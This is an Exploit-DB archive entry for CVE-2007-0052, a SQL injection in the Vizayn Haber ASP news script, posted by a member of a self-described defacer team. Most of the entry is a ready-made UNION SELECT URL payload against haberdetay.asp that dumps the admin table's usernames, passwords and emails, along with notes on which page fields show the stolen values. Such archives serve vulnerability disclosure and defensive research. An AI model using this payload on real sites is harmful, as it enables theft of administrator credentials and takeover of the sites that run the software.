Vizayn Haber haberdetay.asp id variable SQL Injection Vulnerability

2007-01-01T00:00:00
ID EDB-ID:3061
Type exploitdb
Reporter chernobiLe
Modified 2007-01-01T00:00:00

Description

Vizayn Haber (haberdetay.asp id variable) SQL Injection Vulnerability. CVE-2007-0052. Webapps exploit for asp platform

                                        
                                            ###############################################################
#Vizayn Haber (tr) == (tr) SQL Injection Vulnerability
#Author : chernobiLe
#Site : www.cyber-sabotage.org , www.chernobiLe.com
#Contact: info@cyber-sabotage.org
###############################################################
#Risk : High
#Download Link Of Vizayn Haber : http://aspindir.com/goster/4623


#Exploit;
#Admin Nick, Passport, Mail;
http://[SITE]/haberdetay.asp?id=1+union+select+0,PASSWORD,EMAIL,USERNAME+from+ADMIN

#Union data Text;
#Haber Eklenme Tarihi :  USERNAME
#Haber Basligi :               PASSWORD

#Greetz: All CSDT ( Cyber Sabotage and Defacer ) TEAM

# milw0rm.com [2007-01-01]